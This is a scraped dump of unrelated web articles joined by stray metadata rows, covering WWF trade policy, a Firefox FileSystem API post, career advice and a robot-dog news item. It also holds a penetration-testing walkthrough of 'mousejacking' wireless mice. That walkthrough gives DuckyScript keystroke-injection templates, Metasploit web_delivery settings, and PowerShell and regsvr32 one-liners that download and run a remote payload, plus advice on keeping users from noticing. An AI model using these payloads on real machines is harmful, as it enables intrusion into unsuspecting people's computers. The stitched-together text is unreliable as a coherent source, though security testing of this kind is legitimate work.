Tanya Steele, the head of WWF UK, said the post-Brexit trade deals must protect nature: “We cannot be complicit in increasing the risk of the next pandemic. We need strong legislation and trade deals that stop us importing food that is the result of rampant deforestation or whose production ignores poor welfare and environmental standards in producer countries. The government has a golden opportunity to make transformative, world-leading change happen.”
The WWF report said 60-70% of the new diseases that have emerged in humans since 1990 came from wildlife. Over the same period, 178m hectares of forest have been cleared, equivalent to more than seven times the area of the UK.
| true | true | true |
Experts call for legislation and trade deals worldwide to encourage green recovery
|
2024-10-12 00:00:00
|
2020-06-17 00:00:00
|
article
|
theguardian.com
|
The Guardian
| null | null |
|
12,256,605 |
http://phys.org/news/2015-09-people-emit-personal-microbial-cloud.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
25,113,655 |
https://matthewrayfield.com/projects/ai-pokemon/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
4,204,826 |
http://hacks.mozilla.org/2012/07/why-no-filesystem-api-in-firefox/
|
Why no FileSystem API in Firefox? – Mozilla Hacks - the Web developer blog
|
Jonas Sicking
|
A question that I get asked a lot is why Firefox doesn’t support the FileSystem API. Usually, but not always, they are referring specifically to the FileSystem and FileWriter specifications which Google is implementing in Chrome, and which they have proposed for standardization in W3C.
The answer is somewhat complex, and depends greatly on what exact capabilities of the above two specifications the person is actually wanting to use. The specifications are quite big and feature full, so it’s no surprise that people are wanting to do very different things with it. This blog post is an attempt at giving **my** answer to this question and explain why we haven’t implemented the above two specifications. But note that this post represents my personal opinion, intended to spur more conversation on this topic.
As stated above, people asking for “FileSystem API support” in Firefox are actually often interested in solving many different problems. In my opinion most, but so far not all, of these problems have better solutions than the FileSystem API. So let me walk through them below.
## Storing resources locally
Probably the most common thing that people want to do is to simply store a set of resources so that they are available without having to use the network. This is useful if you need quick access to the resources, or if you want to be able to access them even if the user is offline. Games are a very common type of application where this is needed. For example an enemy space ship might have a few associated images, as well as a couple of associated sounds, used when the enemy is moving around the screen and shooting. Today, people generally solve this by storing the images and sound files in a file system, and then store the file names of those files along with things like speed and firepower of the enemy.
However it seems a bit non-optimal to me to have to store some data separated from the rest. Especially when there is a solution which can store both structured data as well as file data. IndexedDB treats file data just like any other type of data. You can write a `File` or a `Blob` into IndexedDB just like you can store strings, numbers and JavaScript objects. This is specified by the IndexedDB spec and so far implemented in both the Firefox and IE implementations of IndexedDB. Using this, you can store all information that you need in one place, and a single query to IndexedDB can return all the data you need. So for example, if you were building a web based email client, you could store an object like:
    {
      subject: "Hi there",
      body: "Hi Sven,\nHow are you doing...",
      attachments: [blob1, blob2, blob3]
    }
Another advantage here is that there’s no need to make up file names for resources. Just store the `File` or `Blob` object. No name needed.
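As a rough sketch of what this looks like in practice (the database and store names below are made up for illustration, not taken from the post), a record with Blob attachments is written with the same IndexedDB calls as any other value:

```js
// Open (or create) a database with an object store for messages.
const request = indexedDB.open("mailDemo", 1);
request.onupgradeneeded = () => {
  request.result.createObjectStore("messages", { keyPath: "id" });
};
request.onsuccess = () => {
  const db = request.result;
  const tx = db.transaction("messages", "readwrite");
  // Blobs sit alongside ordinary fields; no file name is required.
  tx.objectStore("messages").put({
    id: 1,
    subject: "Hi there",
    body: "Hi Sven,\nHow are you doing...",
    attachments: [new Blob(["(attachment bytes)"], { type: "text/plain" })]
  });
  tx.oncomplete = () => db.close();
};
```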
In Firefox’s IndexedDB implementation (and I believe IE’s too) the files are transparently stored outside of the actual database. This means that performance of storing a file in IndexedDB is just as good as storing the file in a filesystem. It does not bloat the database itself slowing down other operations, and reading from the file means that the implementation just reads from an OS file, so it’s just as fast as a filesystem.
Firefox’s IndexedDB implementation is even smart enough that if you store the same Blob multiple times in an IndexedDB database it just creates one copy of the file. Writing further references to the same Blob just adds to an internal reference counter. This is completely transparent to the web page; the only thing it will notice is faster writes and less resource use. However I’m not sure if IE does the same, so check there first before relying on it.
## Access pictures and music folders
The second most common thing that people ask for related to a file system APIs is to be able to access things like the user’s picture or music libraries. This is something that the FileSystem API submitted to W3C doesn’t actually provide, though many people seems to think it does. To satisfy that use-case we have the DeviceStorage API. This API allows full file system capabilities for “user files”. I.e. files that aren’t specific to a website, but rather resources that are managed and owned by the user and that the user might want to access through several apps. Such as photos and music. The DeviceStorage API is basically a simple file system API mostly optimized for these types of files.
We’re still in the process of specifying and implementing this API. It’s available to test with in recent nightly builds, but so far isn’t enabled by default. The main problem with exposing this functionality to the web is security. You wouldn’t want just any website to read or modify your images. We could put up a prompt like we do with the GeoLocation API, but given that this API can potentially delete all your pictures from the last 10 years, we probably want something more. This is something we are actively working on. But it’s definitely the case that security is the hard part here, not implementing the low-level file operations.
## Low-level file manipulation
A less common request is the ability to do low-level create, read, update and delete (CRUD) file operations. For example, being able to write 10 bytes in the middle of a 10MB file. This is not something IndexedDB supports right now; it only allows adding and removing whole files. This is supported by the FileWriter specification draft. However I think this part of the API has some pretty fundamental problems. Specifically, there are no locking capabilities, so there is no way to do multiple file operations and be sure that another tab didn’t modify or read the file in between those operations. There is also no way to do fsync, which means that you can’t implement ACID-type applications on top of FileWriter, such as a database.
We have instead created an API with the same goal, but which has capabilities for locking a file and doing multiple operations. This is done in a way to ensure that there is no risk that pages can forget to unlock a file, or that deadlocks can occur. The API also allows fsync operations which should enable doing things like databases on top of FileHandle. However most importantly, the API is done in such a way that you shouldn’t need to nest asynchronous callbacks as much as with FileWriter. In other words it should easier to use for authors. You can read more about FileHandle at
https://wiki.mozilla.org/WebAPI/FileHandleAPI
## The `filesystem` URL scheme
There is one more capability that exists in the FileSystem API not covered above. The specification introduces a new `filesystem:` URL scheme. When loading URLs from `filesystem:` it returns the contents of files stored using the FileSystem API. This is a very cool feature for a couple of reasons. First of all these URLs are predictable. Once you’ve stored a file in the file system, you always know which URL can be used to load from it. And the URL will continue to work as long as the file is stored in the file system, even if the web page is reloaded. Second, relative URLs work with the `filesystem:` scheme. So you can create links from one resource stored in the filesystem to another resource stored in the filesystem.
Firefox does support the `blob:` URL scheme, which does allow loading data from a Blob anywhere URLs can be used. However it doesn’t have the above-mentioned capabilities. This is something that I’d really like to find a solution for. If we can’t find a better solution, implementing the Google specifications is definitely an option.
## Conclusions
As always when talking about features to be added to the web platform it’s important to talk about use cases and capabilities, and not jump directly to a particular solution. Most of the use cases that the FileSystem API aims to solve can be solved in other ways. In my opinion many times in better ways.
This is why we haven’t prioritized implementing the FileSystem API, but instead focused on things like making our IndexedDB implementation awesome, and coming up with a good API for low-level file manipulation.
Focusing on IndexedDB has also meant that we very soon have a good API for basic file storage available in 3 browsers: IE10, Firefox and Chrome.
On a related note, we just fixed the last known spec compliance issues in our IndexedDB implementation, so Firefox 16 will ship with IndexedDB unprefixed!
As always, we’re very interested in getting feedback from other people, especially from web developers. Do you think that FileSystem API is something we should prioritize? If so, why?
## About Jonas Sicking
Jonas has been hacking on web browsers for over a decade. He started as an open source contributor in 2000, contributing to the newly open sourced mozilla project. In 2005 he joined mozilla full time and has since been working on the DOM and other parts of the web platform. He is now the Tech Lead of the Web API project at mozilla as well as an editor for the IndexedDB and File API specifications at W3C.
| true | true | true |
A question that I get asked a lot is why Firefox doesn't support the FileSystem API. Usually, but not always, they are referring specifically to the FileSystem and FileWriter specifications ...
|
2024-10-12 00:00:00
|
2012-07-05 00:00:00
|
webpage
|
mozilla.org
|
Mozilla Hacks – the Web developer blog
| null | null |
|
16,728,486 |
http://www.mooreds.com/wordpress/archives/2939
|
Leaving well
| null |
Leaving a company in a way that is fair to both you and your company can be difficult. When employed, we spend a large portion of our waking hours at work. You may be leaving a group of people you loved, a toxic environment, a place you’ve outgrown, or a place you’ve loved and just need to move on from for personal reasons. Because of the amount of time invested and the multiplicity of emotional circumstances, it can be difficult to leave well. Below are some thoughts on this career transition, however, I’m not writing about why you should leave, just how the process should go once you’ve made that decision. (Note that some of these apply to transitioning positions within a company.)
**Before you are thinking about leaving**
- Prepare to leave well before you think about leaving by documenting your decisions, processes and systems. This has the added benefit of letting you do better in your current position. When you write down how you do a task, it gives you the chance to review it and consider optimizations, as well as revisit it in the future and perform the task just as well. Make sure to date all documents. When you revisit a system or process, revisit the document.
- Watch how other departing employees are treated. Expect to be treated in a similar manner. Some companies want to usher folks out quickly (to the point of just paying their standard two weeks notice immediately and having them depart) while others will be more flexible. Some managers will treat departing employees with compassion and respect. Others may not.
- You won’t be able to effect change at the company once you have publicly decided to depart. If you want to effect change, stay at the company and work within the system.
**Once you’ve decided to leave**
- Save money and put it into a liquid savings account. How much? As much as you can. This will make the transition less scary and allow you greater flexibility.
- Decide on boundaries and stick to them. Being helpful with the transition doesn’t mean you have to be a doormat.
- It’s always easier to find a job when you have a job. Think about reactivating old networks, inviting folks for coffee, and checking out the job market while you are still in your position.
- When you decide to leave, give as much notice as possible. Since you’ve been observing how folks are treated and you know your own situation, adjust for those factors. However, I’ve found letting managers know about my departure with plenty of notice ensures a smooth departure. Personally, I’ve given up to two months of notice.
- I’ve never had a counteroffer, but I’ve read that accepting them is a poor choice.
- Make a plan with your manager. Take point on this, as you are the person who knows your job best. This plan should be your first task after you’ve told your manager you are departing.
- Keep a spreadsheet of departure tasks including owner, date to be completed and description. Sometimes important things are overlooked. This is where having documentation (see step 1) is helpful, but also look at your to-do lists and your calendar entries.
**Telling your fellow employees**
- Let the company control the narrative about when you are leaving, including when to tell the team. However, if you are approaching your departure date and no one on the team knows, push your manager to publicize it.
- You will likely have many reasons for your departure. Pick a major, true, banal reason or two and answer with that when team members ask why you are leaving. There’s no need to get into every grievance, reason or issue you had.
- Your decisions will have less weight once you announce your departure. This is natural; team members that are staying discount your opinions because you won’t be living with the consequences. Prepare yourself for this.
- Consider offering to consult for the company if it makes sense for you and the timing is right. Charge a fair market rate. Realize that stepping into this role may be difficult emotionally.
- Once your exit is public, your focus should be bringing other employees up to speed so they can do your job when you’re gone. It may feel good to bang out one more bugfix or initiative and if you have time to do that, great, but your primary focus should be on documentation and knowledge transfer.
- Realize that this transition will feel momentous to you, but that it is far less important to everybody else (both inside and outside the company). A company should have no irreplaceable employees.
- Treat everyone as fairly as possible. Remember that you may be working with some of these folks in a few years’ or decades’ time.
- Be professional and courteous (I can’t think of a time when this is bad advice, but at moments of transition it is especially important).
Leaving a job is a very personal decision and will impact your career. Spend time thinking about how to leave well, treat everyone with respect and have a plan.
| true | true | true | null |
2024-10-12 00:00:00
|
2018-04-01 00:00:00
| null | null |
mooreds.com
|
mooreds.com
| null | null |
7,035,532 |
https://medium.com/p/38afa2d7df9b
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
7,771,875 |
http://mjg59.dreamwidth.org/31714.htm
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
15,074,905 |
https://toshellandback.com/2017/08/16/mousejack/
|
Peripheral Pwnage
|
Jonathan
|
# Peripheral Pwnage
**Hostile Airwaves: Mousejacking**
On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials. While this approach has worked on many clients (and has even given up Domain Admin in less time than it takes to grab lunch), what if Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) protocols are configured securely or disabled? Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold? Let’s explore…
*Always* prove multiple means of access whenever possible during engagements!
There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces. One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals. This technique, known as “mousejacking”, gained some notoriety in early 2016 when Bastille, a firm specializing in wireless and Internet of Things (IoT) threat detection, released a whitepaper documenting the issue. At a high-level, the attack involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the associated USB dongle. This is made possible because many wireless mice (and a handful of keyboards) either don’t use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized. WIRELESS WHOOPSIE!
**You Vulnerable, Bro?**
At this point, you are probably wondering which input devices are vulnerable. While a more comprehensive list can be found on Bastille’s website, I’ve personally had the most experience with Microsoft and Logitech products while on engagements.
Vulnerable Microsoft products include, and most certainly aren’t limited to, the following devices:
With Logitech, devices that are likely to be affected are ones that leverage the “Unifying” dongle, which is meant to work with a large number of wireless input devices the company produces. The dongle can be easily identified by an orange star printed on the hardware:
**Have Your Hardware Handy**
To help us conduct our mousejacking attack, we need to first acquire SeeedStudio’s Crazyradio PA USB dongle and antenna. This is a ~$30 long-range 2.4 GHz wireless transmitter (which uses the same series of transceiver, Nordic Semiconductor’s nRF24L, that many of the vulnerable devices leverage) that is intended for use on hobby drones; however, we are going to flash the firmware (courtesy of Bastille) to weaponize it for our own nefarious purposes. *EVIL CACKLE* This new firmware will allow the dongle to act promiscuously, adding packet sniffing and injection capabilities. Once the Crazyradio PA is in hand, the instructions for setting it up with new firmware can be found here.
It is also helpful to have one or more known vulnerable devices on hand to leverage for testing. In my personal lab, I am utilizing Logitech’s m510 Wireless Mini Mouse and Microsoft’s Wireless Mobile Mouse 4000.
**JackIt In The Office (But Don’t Get Caught…)**
The software of choice for this scenario is going to be JackIt, a python script written by phiksun (@phikshun) and infamy (@meshmeld). The project leverages the work of Bastille and simplifies both identification of devices and the attack delivery. Using Kali, or your distribution of choice, go ahead and grab the script:
$ git clone https://github.com/insecurityofthings/jackit.git /opt/
Take a gander at the `README.md` file and follow the instructions to install JackIt. Once that is completed, ensure that the flashed Crazyradio PA dongle is plugged in prior to starting up the tool. Failure to do so will cause JackIt to throw an error. Let’s start by running JackIt without any arguments, which will put the tool into reconnaissance mode, allowing you to see what wireless input devices are in range:
/opt/jackit/$ ./jackit.py
Take a few moments to inspect JackIt’s output before continuing:
When a device is discovered, a new row is created with a number assigned in the `KEY` column based on order of initial appearance. You will need to reference this number when targeting a particular device (more on that shortly). The `ADDRESS` column shows the hardware MAC address for the wireless device. This can be useful when determining whether you’ve previously seen / targeted a particular device (JackIt does not keep track of your previously targeted devices, so when working with multiple devices, you’ll need to keep track of them yourself). The `TYPE` column displays the brand of the device once enough packets are captured by JackIt to accurately identify it. Note that in the screenshot above, the second device (`KEY 2`) has not been adequately fingerprinted yet.
The `COUNT` and `SEEN` columns relate to wireless communication detected between a device and its dongle. `COUNT` refers to the number of times communication between the device and dongle was picked up by the Crazyradio PA. `SEEN` informs us how many seconds have passed since the last communication was detected. Devices that haven’t been detected in a while are either a) not being actively used at the moment or b) no longer in range. With the former, there is a potential that the user has locked their computer and stepped away. In either case, these are probably not ideal targets.
The `CHANNELS` column notates the channel(s) that the wireless peripheral and dongle are utilizing to communicate. Lastly, `PACKET` shows the contents of the last captured communication. For our purposes, we can ignore these two columns.
To actually exploit devices that are discovered, JackIt will need to know what malicious keystrokes to send to a victim. The tool takes commands in Ducky Script format, the syntax leveraged by the Rubber Ducky, a keystroke-injecting USB thumb drive created by Hak5. Whereas a Rubber Ducky requires Duckyscript to be encoded prior to being used for exploitation, this is not the case for JackIt… simply pass the “plaintext” commands in a text file. If you are unfamiliar with Duckyscript, please refer to Hak5’s readme page to get your learn on.
A recommended starting point for a Duckyscript mousejacking template can be found below. Given that it may be possible for a user to see a mousejacking attempt in progress, an attempt has been made to streamline the attack as much as possible without sacrificing accuracy. `DELAY` times are much shorter than with traditional Rubber Ducky scripts as there is no need to wait for driver installation, since we are not physically plugging a USB device into the victim’s machine. In addition to keeping the `DELAY` values low, it is also helpful to shorten the actual attack payload as much as possible. The reason here is twofold: fewer keystrokes means less time to send characters to the victim (each keystroke is literally “typed” out on the target and can draw attention to the attack), as well as a lower chance of any data-in-transit issues (wireless attacks can be unstable, with possible lost or malformed characters). We will discuss these types of issues in greater detail later on.
```
GUI r
DELAY 300
STRING ***INSERT MALICIOUS PAYLOAD HERE***
DELAY 300
ENTER
ENTER
```
Using the script above, JackIt would open the Windows “run” prompt, pause briefly, pass whatever malicious payload we specify, pause briefly, then submit the command. To give you an idea of the speed of keystroke injection as well as user’s visibility of active mousejacking attack, I have recorded a clip of sending a string of character’s to a victim’s machine using the above template:
As you can see, even though we have taken steps to streamline the attack, there is still a window (no pun intended, I promise!) in which a user could be alerted to our activities.
*Note: If the keystrokes injected had been calling a valid program such as `powershell.exe`, the window would have closed at the end of the injection once the program had executed. In this case, the submitted run prompt window popped back up and highlighted the text when it was unable to properly process the command.*
**From Mouse To RAT**
Next stop, Exploitation Station! For most scenarios, there will be a minimum of two machines required. The “attack” machine will have the Crazyradio PA dongle attached and JackIt running. The operator of this machine will walk near or through the target’s physical workspace in order to pick up wireless input devices in use. Any payloads submitted by this machine will direct the victims to reach out to the second machine which is hosting the command & control (C2) server that is either sitting somewhere on the client’s internal network or up in the cloud.
So, what malicious payload should we use? PowerShell one-liners that can deliver remotely hosted payloads are a great starting point. The Metasploit Framework has a module (`exploit/multi/script/web_delivery`
) built specifically for this purpose.
Let’s take a look at the Web Delivery module’s options:
Note the default exploit target value is set to Python. To leverage PowerShell as the delivery mechanism we will need to run `SET TARGET 2`
. This will ensure our generated payload uses the PowerShell download cradle pentesters and malicious actors have come to love! In most cases, we will want to set both `SRVHOST`
and `LHOST`
to point to the machine running the Web Delivery module, which is acting as the C2 server. `SRVPORT`
will set the port for hosting the malicious payload while `LPORT`
sets the port for the payload handler. While it is usually recommended that you use a stageless payload (such as `windows/meterpreter_reverse_https`
) whenever possible in an attempt to increase the chance of successfully bypassing any anti-virus solutions that may be in place, attempting to do so with the Web Delivery module will result in an error. This is due to the payload exceeding Window’s command line limit of approximately 8192 characters (Cobalt Strike payloads bypass this limitation through compression, but that’s another deep dive altogether). Given this limitation, let’s use a staged payload instead: `windows/meterpreter/reverse_https`
. Lastly, let’s set the `URIPATH`
to something short and sweet (`/a`
) to avoid Metasploit generating a random multi-character string for us. Once everything is set up, the module’s options should look similar to the following:
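In plain text, the configuration amounts to the msfconsole commands sketched below (these could also be dropped into a resource script). The IP address and `/a` URI match the example used throughout this post; the ports are illustrative and should be adjusted for your environment:

```
use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/meterpreter/reverse_https
set SRVHOST 192.168.2.10
set SRVPORT 80
set LHOST 192.168.2.10
set LPORT 443
set URIPATH /a
```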
Let’s go ahead and run the module to generate our PowerShell one-liner and start our payload handler:
As mentioned previously, the preference for this type of attack is to have as short a string as possible. What the Web Delivery module generates is a little longer than I would like for most mousejacking attempts:
```
powershell.exe -nop -w hidden -c $v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://192.168.2.10/a');
```
This doesn’t look like a vanilla PowerShell download cradle, does it? The module generates a random variable (`$v`
in this example) and uses that to obfuscate the cradle in order to bypass some defenses. Additionally, there are commands that make the cradle proxy-aware which might assist in the payload successfully calling out to the Internet (potentially helpful if your C2 server resides in the cloud).
We can certainly shorten this payload and have it still work, but we have to weigh the benefits against the tradeoffs of doing so. If our C2 server is internal to the client’s network, we can remove the proxy-related commands and still leave some obfuscation of the cradle intact. Or, if we are looking for the absolute shortest string, we can remove all obfuscation and restore a more standard-looking download cradle. It ultimately comes down to evading user detection vs. evading host-based protections. Below are examples of each modification:
```
powershell.exe -nop -w hidden -c $v=new-object net.webclient;IEX $v.downloadstring('http://192.168.2.10/a');
powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
```
Now that we’ve set up our C2 server and have our malicious string in place, we can modify the Duckyscript template from earlier, making sure to save it locally:
```
GUI r
DELAY 300
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
DELAY 300
ENTER
ENTER
```
To use JackIt for exploitation vs. reconnaissance, simply call the Duckyscript file with the `--script`
flag:
```
/opt/jackit/$ ./jackit.py --script ducky-script.txt
```
In the screenshot below, we can see that we have discovered two wireless peripherals that have been fingerprinted by JackIt. When we are ready to launch our mousejack attack, simply press `CTRL-C`
:
We can select an individual device, multiple devices, or simply go after all that were discovered. Once we’ve made our selection and hit `ENTER`
, our specified attack will launch. Depending on the brand of device targeted, you may see many `10ms add delay`
messages on your screen before the completion of the script. You’ll know that JackIt has finished when you see the following message: `[+] All attacks completed`
.
Let’s take a look at our Web Delivery module and see if any of the attacks were successful:
Looks like we got a hit! While we had attempted to mousejack two targets, only one successfully called back. There are several reasons why a mousejacking attempt might fail and we will discuss those shortly.
So, we’ve now successfully used Metasploit’s Web Delivery module in conjunction with JackIt to compromise a wireless peripheral. There are other frameworks we can utilize that offer similar PowerShell one-liners, including Cobalt Strike and Empire. Let’s briefly talk about Cobalt Strike, since there is a non-PowerShell payload that I like to use for mousejacking.
Cobalt Strike has an attack called Scripted Web Delivery, which is similar to Metasploit’s Web Delivery, but offers more payload options. While there is a PowerShell option available, I am partial to the `regsvr32`
payload as it’s short and sweet; however, this does require Microsoft Office to be installed on the target system as it leverages Visual Basic for Applications (VBA) macros and Component Object Model (COM) scriptlets:
The payload looks similar to the following once everything is configured:
```
regsvr32 /u /n /s /i:http://192.168.2.10:80/a scrobj.dll
```
How this payload works is outside the scope of this article, but if you’re interested in learning more, please check out Casey Smith’s (@subTee) blog post.
Before we continue, I want to mention that I’ve had issues starting up JackIt again after a successful attack, receiving an error message like the one below:
I’ve been able to reproduce this error on Kali running within VMware as well as on a standalone Kali box. Let me know if you experience this phenomenon on other flavors of Linux. The only way to get around this error, other than restarting the operating system, is to unbind and then rebind the USB drivers for the CrazyRadio PA dongle. This can be achieved by unplugging and replugging the CrazyRadio PA or by issuing some specific commands via the console. Luckily for you, my awesome coworker Dan Astor (@illegitimateDA) wrote a Bash script to do all that magic for you. Simply run the following script whenever the error message shows its ugly face, then rerun JackIt:
```
#!/bin/bash
#Tool :: USB device reset script developed for use with JackIt & CrazyRadio PA USB Adapter
#Author :: Dan Astor (@illegitimateDA)
#Usage :: After running an attack with JackIt, run the script to reset the USB adapter. This will fix the USB Core Error Python throws.
#Unbind USB devices from the system and rebind them
for device in /sys/bus/pci/drivers/uhci_hcd/*:*; do
#Unbind the device
echo "${device##*/}" > "${device%/*}/unbind"
#Bind the device
echo "${device##*/}" > "${device%/*}/bind"
done
```
**I Was Told There Would Be Shells…**
So, here we are, owning and pwning unsuspecting victims who fail to know the danger in the dongle. But, what if all doesn’t go according to plan? What if we unleash an attack on multiple peripherals only to discover that there are no shells waiting for us? THE HORROR!
First things first: let’s discuss range. Quite honestly, the antenna that comes with the CrazyRadio PA isn’t an amazing performer despite the dongle being advertised as “long-range.” It only takes one missing or malformed character in our attack string to rain on our pwnage parade. I’ve seen missing characters on more than one occasion and have even witnessed run prompts with an endless string of forward slashes that prevents the prompt from closing, leaving the user no choice but to reboot the affected computer. These situations are not desirable as we don’t receive shells (BOO!), users are potentially alerted to our attacks (BOO TIMES TWO!), and we may even negatively affect the productivity of our client’s employees (CLIENT RAGE!). Based on my experience, I believe many of these issues can be avoided by improving signal strength. I’ve had some luck with powerful Alfa antennas, such as the 9dBi Wifi Booster. The only issue with this particular choice is that one tends to draw a lot of attention walking around with a 15″ antenna sticking out of the side of a laptop. 😛 My advice: experiment with different options and settle on the one that proves reliable at the greatest range.
Second thing to note: Microsoft wireless devices can be tricky little buggers to target. This is because unlike Logitech peripherals, Microsoft utilizes sequence numbers for every communication between device and dongle. JackIt monitors the sequence numbers but if the user performs some action (clicks a button, moves the mouse, etc.) before the attack is delivered, the sequence numbers will no longer align and we will once again find ourselves with missing or malformed characters. While sometimes difficult to pull off, I prefer to have “eyes on” a target if they are using a Microsoft peripheral in order to figure out the ideal time to launch the attack. If I’m completely blind and have both Microsoft and Logitech devices in range, I tend to err on the side of caution and target a Logitech device.
Third consideration: how we choose to construct the URL that points to our payload matters. I found this out the hard way on a recent engagement. Leveraging Cobalt Strike, I was hosting a payload with a URL similar to the examples presented earlier in this post (`http://ip_address/a`
). After launching an attack on a promising target, I discovered that there was no shell waiting for me on the C2 server. Upon inspecting Cobalt Strike’s Web Log, I saw a message similar to the following:
This was perplexing; why did my target attempt to reach a URL ending in a capital `/A`
? Had I somehow mistyped the attack string in my DuckyScript file? After a quick check, this was ruled out. Then, it hit me… the user must have had `CAPS LOCK`
enabled! I was shell-blocked by something so stupid! Ever since that engagement, I leverage numbers (e.g. `/1`
) in my mousejacking URLs to prevent similar issues in the future.
Lastly, there are some remediation actions that the client may have taken. Which brings us to…
**What’s A Poor Dongle To Do?**
The easiest solution to the problem of mousejacking is relatively obvious: stick to wired peripherals (or migrate to Bluetooth). That being said, both Microsoft and Logitech have attempted mitigation strategies for their affected products if you are absolutely in love with your 2.4 GHz device.
Microsoft released a Security Advisory in April 2016 with a corresponding *optional* update. The update attempts to add more robust filtering at the dongle so that rogue keystrokes are detected and properly discarded. Researchers who have tested the update say it’s relatively “hit or miss”, with some devices remaining vulnerable even after the patch is applied.
Logitech has taken a different approach, requiring users to *manually* apply a firmware update in order to remedy the issue. It’s a multi-step procedure that may prove difficult for less technical end users to apply, or too cumbersome for IT departments to roll out manually across an entire user population.
Given these facts, I have a feeling that we will be finding mousejack-able devices within enterprises for a while to come. If within the scope of your engagement, consider adding mousejacking to your toolbox of destruction!
## Erlend
Protip: run the jackit module with the `--reset` flag.
## Jonathan
Protip indeed! I’ll be sure to update the blog post!
| true | true | true |
Hostile Airwaves: Mousejacking On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials. While this approach has worked on many clients, what if Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NTB-NS) protocols are configured securely or disabled? Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold? There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces. One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals. This technique, known as "mousejacking", involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the receiving USB dongle. This is made possible because many wireless mice (and a handful of keyboards) either don't use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized. Let's explore...
|
2024-10-12 00:00:00
|
2017-08-16 00:00:00
| null |
article
|
toshellandback.com
|
To Shell And Back: Adventures In Pentesting
| null | null |
15,273,533 |
https://maziar.io/blog/react-native-development-tips/
|
React Native: Tips for Successful App Development • Maz Ahmadi's Blog
|
Maz Ahmadi
|
React Native is an impressive library for developing cross-platform mobile apps. Below are a few things that I wish I had known when I first started working with React Native.
## Actively Develop on Both Platforms
This is a common mistake, and one that I made early on. I used to extensively develop features on iOS without testing them on Android during development. React Native is a multi-platform tool but there are lots of little things that behave differently on Android in comparison to iOS. It’s best to actively develop for both platforms early on in order to save yourself time and effort in the long-run.
## Setup Automated Testing
One thing that I wish I had done early on was to set up automated testing. As your app grows, the amount of time that it takes to manually test for regressions makes it a daunting task. Get familiar with tools like Jest & Calabash. Figuring out your automated testing early on prevents bugs from sneaking past QA.
## Test on Real Devices
If you’re planning to support multiple versions of iOS, or any version of Android, get real devices and use them for testing. Android has a huge variety of screen sizes, hardware, and manufacturer variants of the Android OS. Continuous integration tools like Buddybuild make it easy to get your app out into the hands of real testers.
## Don’t Be Afraid of Native Code
Consider learning Objective-C/Swift and Java/Kotlin. React Native is a great tool that will speed up development for targeting multiple mobile platforms. At some point however, you may need to expose functionality that doesn’t exist in the core library. Thankfully, React Native’s JavaScript bridge has a pleasant API to work with. It’s even possible to integrate React Native views with an existing native app. Even if you don’t need to port functionality, doing so for fun will teach you about how React Native works under the hood. Getting a good understanding of the inner workings of the library will make you a more successful React Native developer.
## Monitor Native Logs
If you use native modules on Android, you should use Logcat to check for native warnings and errors. On Android, warnings and logs are not automatically bridged to the JavaScript runtime (as they are with *NSLog* on iOS); it is the developer's responsibility to do so. Android Monitor greatly simplifies this task and will even let you analyze memory and CPU usage.
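For example, assuming `adb` from the Android platform tools is on your PATH, one common way to watch just the React Native log tags from a connected device is:

```
adb logcat *:S ReactNative:V ReactNativeJS:V
```

The `*:S` filter silences every other tag, so only the native-side and JavaScript-side React Native messages are shown.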
## Upgrade React Native with Caution
Keep an eye on the RN community website. RN has a monthly release cycle. Since it is still a fairly new library, the APIs are changing quickly. Before updating to a new version in production, make sure that all of your dependent libraries are compatible with the RN version that you’re planning to upgrade to.
That’s it for now! If you have questions about React Native, or if you need help with your React Native project, feel free to get in touch.
| true | true | true |
A list of tips and tricks that I wish I had known when I first started working with a React Native mobile app targeting iOS and Android.
|
2024-10-12 00:00:00
|
2017-09-18 00:00:00
|
article
|
maziar.io
|
Maz Ahmadi's Blog
| null | null |
|
11,198,554 |
http://spectrum.ieee.org/automaton/robotics/military-robots/two-of-googles-most-famous-dogs-really-dont-get-along#.VtS0S4WN9x4.hackernews
|
Two of Google's Most Famous Dogs Really Don't Get Along
|
Evan Ackerman
|
You may recognize one of the dogs in this picture: we’re pretty sure it’s Andy Rubin’s dog, ~~Alex~~ Cosmo [we’ve just been notified that the dog’s name is in fact Cosmo, and Cosmo not only “contributes to most big decisions at Playground” but also serves as its head of security]. Andy Rubin is the co-founder of Android, and for about a year, he managed the robotics program at Google (now known as Alphabet). More recently, he’s been running a hardware incubator called Playground, which has enough clout to summon up another robotic dog with Google ties: Boston Dynamics’ Spot.
Cosmo and Spot do not get along.
The video was posted by Steve Jurvetson, a partner at VC firm DFJ. “I was told that this is the only Spot (their latest robot) in civilian hands,” Jurvetson told *IEEE Spectrum*. (Arguably, the new ATLAS is Boston Dynamics’ latest robot.) Jurvetson was really impressed by the robot’s “lifelike movement.” He added: “And the tradition of the uncanny valley continues . . . To the **un-canine valley**!”
As for Spot, we know that the U.S. Marines were using it as a recon robot late last year but the future of that program is unclear, according to a report from Military.com:
